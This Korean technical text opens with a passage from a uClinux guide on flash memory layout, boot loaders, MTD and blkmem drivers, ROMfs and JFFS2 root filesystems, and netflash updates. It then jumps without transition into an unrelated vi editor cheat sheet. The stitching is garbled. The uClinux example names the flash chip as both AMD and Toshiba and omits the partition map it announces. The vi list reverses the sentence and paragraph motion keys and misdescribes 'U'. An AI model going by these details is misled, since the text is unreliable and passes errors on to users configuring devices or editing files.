커널과 루트 파일 시스템 모두 고정된 시작 주소를 가지는 방법
b. 커널의 마지막 부분에 이어서 루트 파일 시스템이 시작되는 방법
c. 커널과 루트 파일 시스템을 압축하는 방법
(a) 방법은 시스템의 요소들이 고정된 주소에 위치한다는 장점을 가진다. 부트 로더는 커널을 찾기 쉽고, 커널은 루트 파일 시스템을 찾기 쉽다. 또한 커널과 루트 파일 시스템이 서로 독립적으로 업그레이드 되기 쉽다는 장점이 있다. 이 방법의 단점은 커널 이미지와 루트 파일 시스템 사이에 공간이 낭비된다는 것이다.
(b) 방법은 루트 파일 시스템을 독립적인 파티션으로 분리하지 않았기 때문에 공간적인 측면에서 장점을 가진다. 또한 uClinux 시스템에서는 커널 이미지와 루트 파일 시스템을 하나의 파일로 묶는 것이 일반적이다. 이것은 곧 커널과 루트 파일 시스템을 동시에 업그레이드 해야 한다는 것을 의미한다 (종종 이것이 더 좋을 수도 있다).
(c) 방법은 커널과 루트 파일 시스템을 압축해서 저장하므로 플래시 메모리의 공간을 많이 절약할 수 있다. 이 방법을 사용하기 위해서는 압축된 이미지를 RAM 상에 풀 수 있는 부트 로더가 필요하다. 때문에 이 방법은 더 많은 RAM 영역을 차지하지만 다른 방법들에 비해서 많은 플래시 메모리 공간을 절약할 수 있다. 물론 상황에 따라 커널이나 루트 파일 시스템 중의 하나 만을 압축하는 방법도 사용할 수 있다.
여러 개의 파일 시스템 파티션도 물론 가질 수 있다. 이것은 파일 시스템의 일부분을 자주 변경하게 되는 경우나 파티션을 구분하여 읽기/쓰기 권한을 주려고 하는 경우에 유용하다.
4 부트 로더의 사용 여부 #
부팅 시에 가장 먼저 고려해야 할 것은 CPU 마다 다르다. 전원이 켜지면 프로세서는 어디서부터 실행을 시작할까? (ARM 이나 x86 과 같은) 많은 CPU 들은 고정된 시작 주소를 가진다. (m68k 나 Coldfire 에서 사용되는) 또 다른 방식으로는 고정된 주소의 값을 읽어서 그 값을 시작 주소로 사용하기도 한다. 이것은 시스템 시작 코드를 플래시 메모리 상에 집어넣어야 하는 경우에 직접적인 영향을 미친다.
이 시점에서 부트 로더 프로그램을 사용할 지 아니면 직접 uClinux 커널을 시작할 지 고려해 볼 필요가 있다.
CPU 가 (부트 로더를 거치지 않고) 직접 커널 코드에서부터 실행을 시작해도 아무런 문제가 없다. uClinux 시작 코드는 (보통 CPU 칩에 대한 설정과 RAM 설정 등을 포함하는) 모든 하드웨어 설정 작업과 커널의 데이터 영역을 RAM 에 로드하는 일과 BSS 영역을 초기화 하는 일을 수행해야 한다. 하지만 이러한 작업들은 매우 직관적이다. 이 방법의 유일한 문제점은 리셋이 되었을 때 CPU 가 다시 적절히 수행될 수 있도록 커널 코드를 적절한 위치에 배치해야 한다는 점이다. 최근의 대부분의 CPU 들은 주소 0 에서 실행을 시작하거나 0번 근처에 시작 주소를 가지고 있으므로, 이 작업이 간편해 진다.
부트 로더는 (CPU 와 RAM 설정 등의) 기본적인 하드웨어 설정 작업과 uClinux 커널을 적절한 위치에 로드하거나 직접 실행시키는 일을 수행하는 작은 독립적인 (stand-alone) 프로그램이다. 부트 로더에서 몇가지 유용한 작업을 수행하게 할 수도 있다. 사용자에게 플래시 메모리 상에 있는 여러 개의 커널 중에서 어느 것을 사용할 것인지 물어볼 수도 있고, (시리얼 포트나 이더넷 포트와 같은) 다른 I/O 장치를 통해 커널과 루트 파일 시스템을 로드할 수도 있다.
부트 로더에서 잘못된 커널 이미지의 실행을 막는 기본적인 보호 수단을 제공할 수도 있다. 이 기능은 플래시 메모리 상에서 동작할 때 특히 유용한데, 플래시 메모리에서는 (전원 문제 등으로 인해) 커널이나 중요 부분을 업데이트 하는 과정에서 오류가 일어날 수 있고 더 나쁜 경우는 이러한 버그가 있는 코드를 로드해 버릴 수도 있다. 부트 로더는 플래시 메모리 상에 영구적으로 고정되어 있을 수 있으므로 이러한 상황에 대처하는 기능을 제공할 수 있다.
현재 uClinux 에서 사용되는 부트 로더는 여러 가지가 있다. 무료로 사용할 수 있는 부트 로더에는 ?CoLilo, My Right Boot (MRB), ?PPCboot, Motorola dBUG 등이 있다. ?SnapGear 와 Arcturus Networks 같은 회사는 특정한 작업을 수행하는 고유한 부트 로더를 가지고 있다.
5 uClinux 커널의 블럭 디바이스 드라이버 #
현재 uClinux 의 루트 파일 시스템을 포함하는 블럭 디바이스는 아래와 같은 3 종류가 있다:
Blkmem 드라이버
MTD 드라이버
RAM disk 드라이버
blkmem 드라이버는 오래되었지만 여전히 uClinux 에서 가장 많이 사용되고 있다. 이 드라이버는 uClinux 를 위해 고안된 것이지만, 작은 크기의 NOR 플래시와 RAM 상의 루트 파일 시스템 만을 지원한다. 또한 설정하기가 어렵고 파티셔닝을 위해서 테이블 설정에 대한 코드를 변경해야 한다. 하지만 플래시 메모리 상의 특정 영역에 대한 기본적인 쓰기/삭제 연산을 제공한다.
MTD 드라이버는 리눅스의 표준 플래시 메모리 드라이버이다. 이 드라이버는 다양한 플래시 장치를 지원하고 파티셔닝에 대한 강력한 기능을 제공한다. 좀더 복잡한 설정을 위해서 플래시 메모리의 레이아웃을 정의하는 맵 드라이버를 생성한다. 이를 이용해 여러개의 플래시 메모리를 (인터리빙 방식으로) 연결할 수 있으며 심지어 시스템 내의 다른 종류의 플래시 메모리를 연결하는 것도 가능하다. 리눅스 커널에는 MTD 설정을 위한 여러 가지 옵션이 존재한다. 온라인 도움말을 통해 어떤 옵션들이 필요한 지 알아볼 수 있다. 처음에는 MTD 드라이버를 사용하는 장치들을 살펴보는 것이 도움이 될 것이다.
세번째로 리눅스의 RAM disk 드라이버를 사용할 수 있다. 이 드라이버는 주로 디스크 없이 리눅스 시스템을 부팅하고자 할 때 사용된다. RAM disk 드라이버는 플래시 메모리에 대한 어떠한 기능도 제공하지 않으므로 단지 루트 파일 시스템을 유지(holding)할 목적으로만 사용된다. 이 방법은 루트 파일 시스템을 플래시 메모리 상에 압축해서 저장하는 경우에 유용하다.
MTD 드라이버는 플래시 메모리를 위한 강력한 기능을 제공한다. 이것을 이용하면 플래시 메모리를 위해 특별히 고안된 JFFS, ?JFFS2 와 같은 실제 (read/write 가 가능한) 파일 시스템을 사용할 수 있다. blkmem 드라이버로는 불가능하다.
6 루트 파일 시스템 #
uClinux 에서 사용되는 루트 파일 시스템은 여러 가지가 있다.
일반적으로 ?ROMfs 타입이 가장 많이 쓰인다. 이것은 작고 단순한 읽기 전용 파일 시스템이다. ?ROMfs 는 파일의 모든 데이터를 순차적으로 저장하기 때문에 (m68k, ?ColdFire, ARM 과 같이) XIP 를 지원하는 CPU 에서 ?ROMfs 파일 시스템 내의 실행 파일을 직접 실행시킬 수 있다. 이 기능은 시스템 실행 중에 메모리의 사용량을 대폭 감소시킬 수 있다.
Cramfs 는 리눅스 커널 2.4 에서 새롭게 선보인 파일 시스템이다. Cramfs 는 작은 크기의 읽기 전용 파일 시스템으로 설계되었다. Cramfs 의 최대 장점은 모든 파일들이 압축된 형태로 저장되며 실행 중에 그 파일들이 압축 해제된다는 것이다. 파일들이 압축되어 있기 때문에 응용 프로그램이 XIP 로 동작하지 못한다. 이 방법은 플래시 메모리의 사용량을 감소시키지만 프로그램이 실행되기 위해선 RAM 에 복사되어야 하므로 더 많은 RAM 이 필요하게 된다.
시스템에 따라 읽기 전용이 아닌 읽기/쓰기가 가능한 파일 시스템이 필요할 수 있다. 리눅스 MTD 드라이버를 사용하면 플래시 메모리 상에서 JFFS 나 ?JFFS2 와 같은 저널링 파일 시스템을 이용할 수 있다. 저널링 파일 시스템은 (시스템이 적절히 셧다운 되지 않았을 때의 같이) 갑작스럽게 전원이 끊긴 상황에서도 안전하며, 다음번 부팅때 파일 시스템을 체크하지 않아도 된다. JFFS 와 ?JFFS2 는 특별히 플래시 메모리에서 사용하기 위해 설계되었기 때문에 wear leveling 이라고 하는 기능을 제공한다. 이것은 파일 시스템 내의 모든 데이터를 기록하거나 업데이트 할 때 플래시 메모리의 모든 영역이 골고루 사용되도록 (모든 블럭에 비슷한 수의 삭제 연산이 수행되도록) 한다. 이 기능은 플래시 메모리의 수명을 비약적으로 향상시켜 준다. ?JFFS2 는 파일을 압축시켜서 저장하기 때문에 더 적은 공간을 차지한다는 장점도 가지고 있다. 그래서 이전 버전인 JFFS 보다 더 많이 사용된다. 이러한 저널링 파일 시스템을 사용할 때 고려해야 할 또 한가지 사항은 저널링과 가비지 컬렉션 시스템에 의해 약간의 영역이 소비된다는 점이다. 일반적으로 이 크기는 2 블럭 정도?이다 (This wasted space is typically of the order of 2 Flash segments in size).
만약 RAM 디스크를 사용한다면 Ext2 파일 시스템을 쓰는 것이 일반적이다. 이것은 uClinux 에서도 마찬가지이다. Ext2 파일 시스템은 공간적인 측면에서 특별히 효율적이지는 않다. 또한 RAM 디스크에서 수정한 사항은 저장되지 않으므로 다음번 부팅 때 찾아볼 수 없다 (어떤 사람들은 이러한 특징으로 인해 시작시에 항상 파일 시스템의 상태를 알 수 있으므로 임베디드 시스템에서 더 좋을 수도 있다고 한다).
이 밖에도 사용할 수 있는 몇가지 파일 시스템이 더 존재한다. 리눅스에는 많은 수의 파일 시스템이 사용 가능하다. 하지만 위에서 말한 파일 시스템들이 uClinux 에서 주로 사용되는 것들이다. 원한다면 MS-DOS 의 FAT 파일 시스템도 사용할 수 있다.
한가지 더 말하자면, 루트 파일 시스템은 uClinux 상에서 사용될 수 있도록 구성되어야 한다. 보통 임베디드 장치에서 사용될 루트 파일 시스템은 개발 호스트에서 구성된 후에 타겟에 로드된다. 일반적으로 호스트 상에서 타겟에 올라갈 최종 루트 파일 시스템의 디렉토리 트리를 구성한 후에 호스트 기반의 툴을 사용하여 이진 파일 시스템 이미지를 만든다. genromfs 라는 프로그램이 대표적인 예이다. 이 프로그램은 호스트 상의 주어진 디렉토리를 ?ROMfs 이미지 파일로 구성한다. 다른 파일 시스템에 대해서도 비슷한 프로그램이 존재한다 (JFFS 는 mkfs.jffs, CD 이미지(?ISO9660)는 mkisofs 라는 프로그램이 담당한다).
7 플래시 메모리를 위한 도구들 #
uClinux 상에서 플래시 메모리를 다루기 위해 응용 프로그램 수준에서 다룰 수 있는 몇가지 프로그램이 존재한다. 이 중 몇몇은 사용하고 있는 블럭 디바이스 드라이버에 종속적이다.
MTD 드라이버와 함께 사용할 수 있는 것들은 다음과 같다:
erase -- 특정 블럭에 삭제 연산 수행
eraseall -- 모든 블럭에 삭제 연산 수행
lock -- 특정 블럭을 쓰기 연산을 위해 잠금
unlock -- 특정 블럭에 대해 쓰기 연산 잠금 해제
mkfs.jffs -- 주어진 디렉토리에 대한 JFFS 파일 시스템 구성
mkfs.jffs2 -- 주어진 디렉토리에 대한 JFFS2 파일 시스템 구성
erase, eraseall, lock, unlock 프로그램은 모두 MTD 파티션 내의 타겟 장치에서 사용된다. mkfs.jffs 와 mkfs.jffs2 는 일반적으로 호스트 시스템 상에서 타겟 장치의 플래시 메모리에 로드될 파일 시스템 이미지를 구성하는데 사용된다. MTD 드라이버는 타겟 장치에 대한 기본적인 문자 장치와 블럭 장치를 제공하므로 dd 와 같은 시스템 툴을 사용하여 특정한 내용을 플래시 메모리에 기록할 수 있다.
netflash 는 uClinux 를 위해 개발된 툴로서, MTD 드라이버나 blkmem 드라이버에서 모두 다 사용된다. netflash 는 주어진 파일을 플래시 메모리에 기록한다 (물론 삭제 연산을 먼저 수행한다). netflash 는 시스템 상의 로컬 파일 뿐 아니라 (tftp, httpd, NFS 등을 이용해) 네트워크를 통해 파일을 받아서 플래시 메모리에 기록할 수도 있다.
8 예제 #
이제 지금까지 논의한 여러가지 세부적인 사항들을 점검해 보기위해 실제로 사용되고 있는 예제를 하나 살펴보기로 하자. 예제 시스템은 ?ColdFire 5272 프로세서에 AMD 의 2Mb 플래시 메모리와 4Mb SDRAM 이 장착되어 있다 (참고로, 이것은 ?SnapGear 사의 LITE VPN router product 이다).
시스템에는 uClinux 2.4.x 커널이 사용되었고, 플래시 메모리를 위해 MTD 드라이버를 사용한다. 여기서는 읽기/쓰기가 가능한 파일 시스템이 필요치 않으므로 대신에 ?ROMfs 를 사용하기로 한다.
시스템에 사용된 AMD 플래시 메모리는 "bottom boot" 타입이다. 아래쪽의 주소 공간에는 각각 16KB, 8KB, 8KB, 32KB 의 크기를 가지는 작은 삭제 블럭들이 있다. 나머지 블럭은 모두 64KB 로 동일하다.
플래시 메모리의 파티션 맵은 아래와 같은 형태가 된다:
그리고 MTD 드라이버는 Toshiba 플래시 메모리를 인식하고 우리가 원하는 매핑에 따라 파티션을 분할해 준다. MTD 드라이버는 디버그 정보의 레벨을 조정할 수 있는 옵션을 가지며 이것은 커널 설정에서 정해줄 수 있다. 이 값을 높이면 장치 검색 과정에 대한 많은 정보를 제공하며 검색된 플래시 메모리에 대한 더 자세한 정보를 얻을 수 있다.
초기의 검색 메시지로부터 플래시 메모리가 CPU 주소 공간의 0xf0000000 매핑된다는 것을 알 수 있다. 이 주소값은 매핑 드라이버에 설정된다 (nettel-uc.c).
실제로 커널과 파일 시스템 이미지는 netflash 프로그램을 통해 업데이트 된다. 명령행 옵션은 간단히 표현하자면 다음과 같다:
netflash <서버 IP> imagez.bin
서버 IP에 이미지를 제공할 tftp 서버의 주소를 써 넣으면 netflash 프로그램이 나머지 일을 다 처리해 주고 완료된 경우 시스템을 리부팅한다 (루트 파일시스템이 플래시 메모리에서 커널 바로 뒤에 배치되어 있을 때 필요한 과정이다).
9 참고 문헌 #
다음 URL 을 참고하기 바란다:
http://www.uclinux.org : uClinux 홈페이지
http://www.linux-mtd.infradead.org : 리눅스 MTD 드라이버 홈페이지
http://www.ucdot.org : uClinux 관련 뉴스, 현재의 진행 사항 등 소개
관련된 SnapGear 의 기술 문서 #16 New Linux MTD driver support for the M-Systems Millennium Plus family of DiskOnChip flash devices(http://www.cyberguard.info/snapgear/tb20030402.html) 도 살펴보도록 하자.
[범위]/s/[target pattern]/[replacing pattern]/[옵션] [카운트]
옵션
c : 치환전 확인
g : 글로벌 치환
p : 치환된 마지막 라인 출력
예제
:1,10s/yes/no/g 처음 10행 치환
:%s/[Hh]ello/Hi/gc 치환 확인 물음
:s/Fortran/\U&/ 3 다음 3행의 "Fortran"을 대문자로 치환
:g/^[0-9][0-9]*/s//Line &:/ 숫자가 있는 모든라인에 Line: 추가
----------------------
[vi] 파일 오가며 편집하기
----------------------
:e#
"f4yy → :w → :e other_file → "fp
:f 버퍼에 4라인 복사후 붙이기
"F6yy
:f 버퍼에 6라인 추가
파일을 생성하거나 편집하는데 사용하는 프로그램을 에디터(editor)라고 합니다.
유닉스에서 사용하는 에디터 중 vi 에디터 텍스트 편집기로 가장 대표적인 프로그램은 vi 에디터 입니다. vi 편집기는 Visual Editor로서, 모든 유닉스 시스템에 있으며 따라서 vi 편집기를 사용할 수 있다는 것은 어떤 유닉스 시스템에서도 문서 작업을 할 수 있다는 것을 의미합니다.
예를 들어 전자우편을 작성하거나, 프로그램을 작성하는 일, 또는 기타문서를 작성할 때에 편집기는 필수적인 연장(tool)입니다.
- vi 에디터 구성과 방법
vi는 입력 모드와 명령어 모드 그리고 라인 모드의 세 가지 형태로 구성되어 있습니다.입력모드는 일반적은 텍스트 에디터와 같이 원하는 문자를 입력할 수 있는 상태를 말하고, 명령어 모드는 입력한 내용을 편집하기 위해서 다양한 편집 관련 명령어를 사용 할 수 있는 상태를 의미 한다.
따라서 입력 모드에서는 문자의 입력만이 가능하며 문단의 재구성과 삽입, 삭제 등의 편집 기능은 오직 명령어 모드에서만 사용할 수 있습니다.
vi를 실행한 직후에는 명령어 모드에 위치하게 되며 i(insert)나 a(append), o(open)를 입력하게나 <Insert> 키를 이용해서 입력 모드로 전환할 수 있다.
입력 모드에서 명령어 모드로 복귀할 때는 <Esc>키만을 사용합니다.입력 모드로 전화 i 또는 a 또는 o 또는 <Inset> 명령어 모드로 전환 <Esc>vi는 입력 모드와 명령어 모드 이외에 라인 모드를 추가로 갖고 있는데, 이는 셸 명령어나 외부 프로그램들을 에디터의 내부에서 직접 실행 시킬 수 있는 모드입니다.
라인 모드는 vi의 본체인 ex가 실행되는 상테이므로 보다 원초적인 텍스트 조작이 가능해진다. 또한 라인 모드는 셸과 직접 연결되어 파이프를 구성하기 때문에 작업 중인텍스느에 대해서 다양한 작업을 연결시킬 수 있다.
다른 모드와는 달리 라인 모드는 화면의 마지막 줄에 라인 모드임을 알리는 콜론(:)과 함께 입력한 내용이 출력되어 진행 중인 내용을 확인을 할 수 있도록 되어 있다. 라인 모드는 명령어 모드에서만 전환될 수 있으며, 입력 모드에서 직접 라인 모드로 들어올 수 없다.
따라서 vi 에디터는 실행 직후에 위치한 명령어 모드에서 입력 모드 그리고 라인 모드의 세 가지 모드를 상호 전환시키면서 작업을 진행하는 방식으로 사용된다.
그림 삽입.
라인 모드에서 :을 먼저 입역한 뒤에 원하는 명령어를 입력하는 방식으로 vi 명령어 이외의 셸 명령어와 외부 명령어들을 실행시킬 수 있다.
1.시작
vi file vi를 시작하여 지정한 파일 편집
vi -R file 읽기 전용(read- only) 편집기로서 vi를 시작하여 지정한 파일 편집
view file 읽기 전용(read- only) 편집기로서 vi를 시작하여 지정한 파일 편집
2.종료
:wq 데이터를 저장하고 종료
:q! 데이터를 저장하지 않고 종료
3. 디스플레이 제어하기
^L 현재 화면을 다시 디스플레이하기
:set number 내부 줄 번호 디스플레이
:set nonumber 배부 줄 번호 디스플레이 않기
4. 마지막으로 지운 것 복사하기
p 마지막으로 지워진 것을 커서의 뒤/아래에 삽입
P 마지막으로 지워진 것을 커서의 앞/위에 삽입
xp 두 문자를 바꿈
deep 두 단어를 바꿈
ddp 두 줄을 바꿈
5. 패턴 검색
/rexp 지정된 정규 표현식에 대해 앞으로 이동
/ 이전의 패턴에 대해 앞으로 검색을 반복
?rexp 지정된 정규 표현식에 대해 뒤로 이동
? 이전의 패턴에 대해 뒤로 검색을 반복
n /나 ?명령에 대해 같은 방향으로 반복
N /나 ?명령에 대해 반대 방향으로 반복
6. 약어의 사용
:ab short long short를 long에 대한 약어로 변경
:ab 현재 약어 목록을 표시
:una short 약어 short를 표시
7. 줄 길이의 조정
r<Return> 문자를 뉴라인으로 변경
J 줄의 결합
:set wm=n 오른쪽으로 n문자 위치에서 자동적으로 줄 나눔
8. 커서 이동
h<Left> 커서를 한 칸 왼쪽으로 이동
j<Down> 커서를 한 줄 아래로 이동
k<Up> 커서를 한 줄 위로 이동
l<Right> 커서를 한 칸 오른쪽으로 이동
<Backspace> 커서를 한 칸 왼쪽으로 이동
<Space> 커서를 한 칸 오른쪽으로 이동
- 커서를 이전 줄의 처음으로 이동
+ 커서를 다음 줄의 처음으로 이동
<Return> 커서를 다음 줄의 처음으로 이동
0 커서를 현재 줄의 맨 앞으로 이동
$ 커서를 현재 줄의 맨 끝으로 이동
^ 커서를 현재 줄의 첫글자(공백이나 탭이 아닌)로 이동
w 커서를 다음 단어의 첫 글자로 이동
e 커서를 다음 단어의 끝 글자로 이동
b 커서를 이전 단어의 첫 글자로 이동
W w와 같음(문장 부호 무시)
E e와 같음(문장 부호 무시)
B b와 같음(문장 부호 무시)
( 다음 문장의 처음으로 이동
) 이전 문장의 처음으로 이동
{ 다음 문단의 처음으로 이동
} 이전 문단의 처음으로 이동
H 커서를 화면 맨 위로 이동
M 커서를 중간으로 이동
L 커서를 맨 아래로 이동
9. 편집 버퍼를 통한 이동
^F 한 화면 아래로 이동
^B 한 화면 위로 이동
n^F n화면 아래로 이동
n^B n화면 위로 이동
^D 반 화면 아래로 이동
^U 반 화면 위로 이동
n^D n줄만큼 아래로 이동
n^U n줄만큼 위로 이동
10. 셸 명령 실행
:!command vi를 중단하고 지정한 셸 명령을 실행
:!! vi를 중단하고 이전의 셸 명령을 실행
:sh vi를 중단하고 셸을 실행
:!csh vi를 중단하고 새로운 C-셸을 실행
11. 패턴에 의한 치환
:s/pattern/replace/ 현재 줄의 치환
:lines/pattern/replace/ 지정한 줄의 치환
:line,lines/pattern/replace/ 지정한 범위의 치환
:%s/pattern/replace/ 모든 줄의 치환
12. 데이터 읽기
:liner file file의 내용을 지정한 줄 다음에 삽입
:r file file의 내용을 현재의 줄 다음에 삽입
:liner !command command의 결과를 지정한 줄 다음에 삽입
:r !command command의 결과를 현재의 줄 다음에 삽입
:r !look pattern 지정한 pattern으로 시작된 단어 삽입
13. 정규 표현식을 사용하기 위한 특수 기호
.
뉴라인을 제외한 모든 단일 문자와 대응
*
영 또는 그 이상의 선행 문자와 대응
^
줄의 시작과 대응
$
줄의 끝과 대응
\<
단어의 시작과 대응
\>
단어의 끝과 대응
[ ]
묶여진 문자중의 하나와 대응
[^ ]
묶여진 문자를 제외한 아무것하고나 대응
\
이어지는 기호를 문자 그대로 해석
14. 줄 번호
nG 줄번호 n으로 건너뛰기
1G 편집 버퍼의 첫 줄로 건너뛰기
G 편집 버퍼의 마지막 줄로 건너뛰기
:map g lG g가 lG와 같도록 매크로 정의
15. 삽입
i 입력 모드로 전환, 커서 위치 앞에서 삽입
a 입력 모드로 전환, 커서 위치 뒤에서 삽입
I 입력 모드로 전환, 현재 줄의 앞에 삽입
A 입력 모드로 전환, 현재 줄의 끝에 삽입
o 입력 모드로 전환, 현재 줄의 아래에 전개
O 입력 모드로 전환, 현재 줄의 위에 전개
16. 편집하고 있는 파일을 바꾸기
:e file 지정한 파일의 편집
:e! file 지정한 파일의 편집, 자동 점검의 생략
17. 내용 고치기
r 단지 한 글자만 변경(입력 모드로 바뀌지 않음)
R 입력하는 대로 겹쳐 써서 변경
s 삽입에 의해 한 단어의 변경
C 커서의 위치로부터 줄 끝까지 삽입에 의한 변경
cc 전체 줄을 삽입에 의한 변경
S 전체 줄을 삽입에 의한 변경
cmove 커서부터 move까지 삽입에 의해 변경
~ 대,소문자 바꾸기
18. 고치기의 취소 또는 반복
u 편집 버퍼를 수정했던 마지막 명령을 취소
U 현재 줄을 저장
. 편집 버퍼를 수정했던 마지막 명령 반복
19. 문자 삭제
x 커서가 있는 문자 삭제
X 커서의 왼쪽 문자 삭제
D 커서부터 줄의 끝까지 삭제
dd 현재 줄의 전체 삭제
dmove 커서부터 move까지 삭제
dG 커서부터 편집 버퍼의 끝까지 삭제
d1G 커서부터 편집 버퍼의 맨 앞까지 삭제
:lined 지정한 줄의 삭제
:line, lined 지정한 범위의 삭제
20. 여러 줄의 복사와 이동
:linecotarget 지정한 줄을 복사하여 target 줄 밑에 삽입
:line, linecotarget 지정한 범위를 복사하여 target 줄 밑에 삽입
:linemtarget 지정한 줄로 이동하여 target 줄 밑에 삽입
:line, linemtarget 지정한 범위로 이동하여target 줄 밑에 삽입
21. 데이터를 처리하기 위한 셸 명령의 사용
n!!command n번 줄에서 command의 실행
!move command 커서부터 move까지 command 실행
!move fmt 커서부터 move까지 줄들을 형식 맞추기
22. 데이터 저장하기
:w 원래의 파일로 데이터를 저장
:w file 지정한 파일로 데이터를 저장
:w>> file 지정한 파일에 데이터를 추가